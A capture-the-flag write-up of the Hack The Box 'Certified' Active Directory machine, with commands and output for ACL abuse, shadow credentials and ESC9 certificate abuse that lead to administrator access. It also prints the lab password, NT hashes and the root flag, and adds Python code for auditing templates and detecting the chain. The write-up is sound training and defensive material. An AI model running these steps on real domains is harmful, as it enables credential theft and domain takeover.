This article explains how, starting from the judith.mader user, information gathering and vulnerability analysis lead to privilege escalation and the root flag. First, Nmap is used to identify the target's open ports and services. Next, bloodhound-python collects domain information, and ACL abuse adds judith.mader to the Management group to gain further rights. Finally, Certipy is used to request a certificate and authenticate as administrator, which yields root privileges. Each step's commands and output are shown, demonstrating penetration testing and privilege escalation in a Windows Active Directory environment.

Information Gathering

# Nmap 7.98 scan initiated Fri Jan  2 03:47:32 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.14s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-02 10:17:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/2%Time=69573FE9%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-01-02T10:18:15
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 6h29m38s, deviation: 0s, median: 6h29m38s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  2 03:49:17 2026 -- 1 IP address (1 host up) scanned in 105.83 seconds

Vulnerability Analysis

judith.mader:judith09

First, synchronize the local clock with the DC: the scan reported a skew of about 6h29m, and Kerberos rejects requests whose timestamp is more than 5 minutes off.

➜  Certified sudo date -s "$(nmap -p 445 10.10.11.41 --script smb2-time | grep 'date: 2'|cut -d ' ' -f 5)"
Fri Jan  2 10:29:36 AM UTC 2026

Collect domain information with bloodhound-python:

bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -dc 'dc01.certified.htb' -c all -ns 10.10.11.41 --zip

[BloodHound graph omitted; the path it shows is:]

judith.mader (user) --WriteOwner--> Management (group) --GenericWrite--> Management_SVC (user) --GenericAll--> CA_OPERATOR (user)

Exploitation (User Flag)

# Change the owner of the Management group to judith.mader (WriteOwner)
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' set owner 'management' judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management
# As the owner, grant judith.mader GenericAll on the group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add genericAll 'management' judith.mader
[+] judith.mader has now GenericAll on management
# Add judith.mader to the group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add groupMember 'management' judith.mader
[+] judith.mader added to management
# Confirm the membership with the nxc ldap module
nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --query "(sAMAccountName=judith.mader)" "memberOf"

Now that judith.mader is a member of Management, the group's GenericWrite over the Management_SVC user becomes usable.

# Use GenericWrite to add a shadow credential (msDS-KeyCredentialLink) to Management_SVC; bloodyAD then authenticates with it via PKINIT and recovers the account's NT hash
➜  Certified bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add shadowCredentials 'management_svc'
[+] KeyCredential generated with following sha256 of RSA key: 27e6dac6b3bf03d0ae9997665206b05b54de55bd629b95d8acd1f3e090c4248f
[+] TGT stored in ccache file management_svc_Df.ccache

NT: a091c1832bcdd4677c28b5a6a1295584

Privilege Escalation (Root Flag)

➜  Certified certipy find -u ca_operator@certified.htb -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -vulnerable -stdout

The output reports ESC9: the CertifiedAuthentication template is issued without the szOID_NTDS_CA_SECURITY_EXT (SID) extension, so unless the KDC is in full certificate-binding enforcement the certificate is mapped to an account by its SAN UPN alone, and a principal who can edit a target user's UPN can obtain a certificate that logs on as a different account.
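As an added audit example (not from the writeup and not Certipy's own code), the following Python models the template-side and KDC-side checks behind an ESC9 finding and the template-side fix. The template name CertifiedAuthentication is taken from the writeup; every attribute value, enrollment right and the KDC registry value are constructed assumptions.

```python
"""Audit AD CS certificate templates for the ESC9 preconditions.

Added example: not from the writeup and not Certipy's code. It models the check
behind `certipy find -vulnerable`: a template issued without the
szOID_NTDS_CA_SECURITY_EXT (SID) extension, usable for client authentication,
on a domain whose KDC is not in full certificate-binding enforcement. The
template records and registry value below are constructed; in a real audit the
templates come from LDAP (CN=Certificate Templates,CN=Public Key Services,
CN=Services,CN=Configuration,...) and the enforcement level from
HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc\\StrongCertificateBindingEnforcement.
"""

# msPKI-Enrollment-Flag bit (MS-CRTD): issue certificates without the SID extension.
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000

# EKUs that make a certificate usable for Kerberos/Schannel client authentication.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Meaning of the KDC's StrongCertificateBindingEnforcement value.
ENFORCEMENT = {0: "Disabled", 1: "Compatibility", 2: "Full Enforcement"}


def allows_client_auth(ekus):
    """A template with an empty EKU list is valid for any purpose, including logon."""
    return not ekus or bool(set(ekus) & CLIENT_AUTH_EKUS)


def esc9_findings(templates, strong_binding_enforcement):
    """One finding per enabled template that meets the template-side ESC9 conditions.

    `exploitable` is False under Full Enforcement: a certificate without the SID
    extension then fails strong mapping and cannot be used to log on at all.
    """
    findings = []
    for t in templates:
        if not t.get("enabled", True):
            continue
        no_sid_ext = bool(t["msPKI-Enrollment-Flag"] & CT_FLAG_NO_SECURITY_EXTENSION)
        if no_sid_ext and allows_client_auth(t["pKIExtendedKeyUsage"]):
            findings.append({
                "template": t["name"],
                "enrollers": sorted(t["enrollment_rights"]),
                "kdc_mode": ENFORCEMENT.get(strong_binding_enforcement, "unknown"),
                "exploitable": strong_binding_enforcement != 2,
            })
    return findings


def remediated_flags(template):
    """Template-side fix: clear the bit so newly issued certificates carry the SID."""
    return template["msPKI-Enrollment-Flag"] & ~CT_FLAG_NO_SECURITY_EXTENSION


# Constructed templates: the first name mirrors the writeup, all attribute values are made up.
TEMPLATES = [
    {"name": "CertifiedAuthentication", "enabled": True,
     "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION | 0x8,   # 0x8 = publish to DS
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enrollment_rights": ["CERTIFIED\\Domain Users"]},              # placeholder group
    {"name": "User", "enabled": True,
     "msPKI-Enrollment-Flag": 0x29,                                   # SID extension present
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"],
     "enrollment_rights": ["CERTIFIED\\Domain Users"]},
    {"name": "WebServer", "enabled": True,
     "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION,          # no SID, but no logon EKU
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "enrollment_rights": ["CERTIFIED\\Domain Admins"]},
]

if __name__ == "__main__":
    for f in esc9_findings(TEMPLATES, strong_binding_enforcement=1):
        print(f"ESC9 {f['template']}: enrollers={f['enrollers']} "
              f"kdc={f['kdc_mode']} exploitable={f['exploitable']}")
```

Run as-is it reports only CertifiedAuthentication: the User template carries the SID extension, and WebServer lacks it but has no logon EKU. Setting the enforcement value to 2 keeps the template finding but marks it non-exploitable, which is the KDC-side mitigation; clearing the flag with remediated_flags is the template-side one.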

Use management_svc's GenericAll over ca_operator to change its UPN to administrator:

➜  Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'

Request a certificate as ca_operator from the CertifiedAuthentication template; the issued certificate carries the current UPN, administrator, in its SAN:

➜  Certified certipy req -u CA_OPERATOR -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'CertifiedAuthentication' -debug
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Restore the original UPN so that 'administrator' no longer resolves to ca_operator and the certificate's SAN UPN maps to the real Administrator account:

➜  Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'CA_OPERATOR@certified.htb' -user 'CA_OPERATOR' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : CA_OPERATOR@certified.htb
[*] Successfully updated 'ca_operator'

Authenticate with the certificate, which also yields the administrator NT hash, then log in over WinRM:

➜  Certified certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
➜  Certified evil-winrm -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -i certified.htb

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
25313f415eb17c6f9856e10e820d9769
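From the defender's side, every step of the chain above leaves a directory or CA audit trail. The following Python is an added example (not part of the writeup) that runs simple correlation rules over constructed records shaped after Windows Security events 5136 (directory service object modified), 4887 (CA issued a certificate) and 4768 (Kerberos TGT requested). The account names and template name come from the writeup; the event field names, DNs, SID placeholders and the ACL-editor allow list are simplified assumptions.

```python
"""Detection logic for the ACL-abuse, shadow-credential and ESC9 chain shown above.

Added example, not part of the writeup. The records are constructed samples shaped
after Windows Security auditing events (5136 directory object modified, 4887 CA
issued a certificate, 4768 Kerberos TGT requested) with field names simplified;
a real pipeline would fill them from the events' XML data, and the account list
and ACL-editor allow list would come from the directory rather than being hard-coded.
"""
from collections import defaultdict

ACCOUNTS = {"administrator", "ca_operator", "management_svc", "judith.mader"}
ACL_EDITORS = {"administrator"}          # principals expected to rewrite security descriptors

USERS = "CN=Users,DC=certified,DC=htb"    # constructed container DN
EVENTS = [
    # WriteOwner abuse: owner and then DACL of the Management group rewritten by a plain user
    {"id": 5136, "subject": "judith.mader", "object": f"CN=Management,{USERS}",
     "attribute": "nTSecurityDescriptor", "value": "O:<judith.mader SID>...", "op": "added"},
    {"id": 5136, "subject": "judith.mader", "object": f"CN=Management,{USERS}",
     "attribute": "nTSecurityDescriptor", "value": "D:(A;;GA;;;<judith.mader SID>)...", "op": "added"},
    # the user adds herself to the group
    {"id": 5136, "subject": "judith.mader", "object": f"CN=Management,{USERS}",
     "attribute": "member", "value": f"CN=judith.mader,{USERS}", "op": "added"},
    # shadow credential written to another account
    {"id": 5136, "subject": "judith.mader", "object": f"CN=management_svc,{USERS}",
     "attribute": "msDS-KeyCredentialLink", "value": "B:828:<keycredential blob>", "op": "added"},
    # ESC9: UPN set to another account's name, certificate issued, UPN reverted
    {"id": 5136, "subject": "management_svc", "object": f"CN=ca_operator,{USERS}",
     "attribute": "userPrincipalName", "value": "administrator", "op": "added"},
    {"id": 4887, "requester": "CERTIFIED\\ca_operator", "template": "CertifiedAuthentication",
     "san_upn": "administrator"},
    {"id": 5136, "subject": "management_svc", "object": f"CN=ca_operator,{USERS}",
     "attribute": "userPrincipalName", "value": "CA_OPERATOR@certified.htb", "op": "added"},
    # PKINIT logon (pre-authentication type 16 = PA-PK-AS-REQ) under the borrowed name
    {"id": 4768, "account": "administrator", "preauth_type": 16, "cert_issuer": "certified-DC01-CA"},
]


def rdn_name(dn):
    """'CN=name,...' -> 'name', lower-cased."""
    return dn.split(",")[0].split("=", 1)[1].lower()


def upn_local(upn):
    return upn.split("@", 1)[0].lower()


def detect(events, accounts=ACCOUNTS, acl_editors=ACL_EDITORS):
    """Return (rule, target, actor_or_value) tuples in event order."""
    alerts = []
    upn_writes = defaultdict(set)       # account -> local parts ever written into its UPN
    for e in events:
        if e["id"] == 5136 and e["op"] == "added":
            subject, target, attr = e["subject"].lower(), rdn_name(e["object"]), e["attribute"]
            if attr == "nTSecurityDescriptor" and subject not in acl_editors:
                alerts.append(("owner_or_dacl_change", target, subject))
            elif attr == "member" and rdn_name(e["value"]) == subject:
                alerts.append(("self_added_to_group", target, subject))
            elif attr == "msDS-KeyCredentialLink" and subject != target:
                alerts.append(("shadow_credential", target, subject))
            elif attr == "userPrincipalName":
                local = upn_local(e["value"])
                upn_writes[target].add(local)
                if local != target and local in accounts:
                    alerts.append(("upn_collision", target, local))
        elif e["id"] == 4887:
            requester = e["requester"].split("\\")[-1].lower()
            san = upn_local(e["san_upn"])
            if san != requester:
                alerts.append(("san_requester_mismatch", requester, san))
        elif e["id"] == 4768 and e.get("preauth_type") == 16:
            acct = e["account"].lower()
            lenders = [t for t, names in upn_writes.items() if acct in names and t != acct]
            if lenders:
                alerts.append(("pkinit_as_rewritten_upn", acct, lenders[0]))
    return alerts


if __name__ == "__main__":
    for rule, target, detail in detect(EVENTS):
        print(f"{rule:26} target={target:16} detail={detail}")
```

The UPN rules are the ones specific to ESC9: a UPN whose local part equals another account's sAMAccountName, a certificate whose SAN names someone other than the requester, and a PKINIT logon for a name that was recently written into a different account's UPN. The revert step produces no alert on its own, which is why the correlation keeps the history of values written rather than only the current one. Note that 5136 requires directory-service change auditing and a SACL on the objects of interest, and that real 5136 modifications of nTSecurityDescriptor arrive as a deleted/added pair.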

Lessons Learned
